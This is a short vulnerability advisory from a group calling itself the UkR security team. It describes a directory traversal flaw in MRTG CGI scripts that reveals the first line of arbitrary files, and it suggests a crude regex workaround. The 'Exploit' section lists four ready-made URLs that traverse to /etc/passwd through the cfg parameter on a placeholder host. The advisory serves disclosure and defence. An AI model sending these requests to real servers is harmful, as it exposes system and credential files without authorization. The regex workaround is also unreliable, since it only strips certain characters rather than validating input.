---=== UkR Security Team advisory
===---
Name : MRTG CGI script "show files" Vulnerability
About : The Multi Router Traffic Grapher (MRTG) is
a tool to monitor the traffic
load on network-links. MRTG generates
HTML pages containing GIF
images which provide a LIVE visual
representation of this traffic
Product vendor: MRTG / http://www.mrtg.org
Problem : Problem lyes in incorrect validation of
user submitted
-by-browser information, that can show
first string of any file of the
system where script installed.
Workaround : this will help in somewhat : $input =~
s/[(\.\.)|\/]//g;
Author : UkR-XblP / UkR security team
Exploit :
http://www.target.com/cgi-bin/14all.cgi?cfg=../../../../../../../../etc/passwd
http://www.target.com/cgi-bin/14all-1.1.cgi?cfg=../../../../../../../../etc/passwd
http://www.target.com/cgi-bin/traffic.cgi?cfg=../../../../../../../../etc/passwd
http://www.target.com/cgi-bin/mrtg.cgi?cfg=../../../../../../../../etc/passwd
---
Professional hosting for everyone - http://www.host.ru
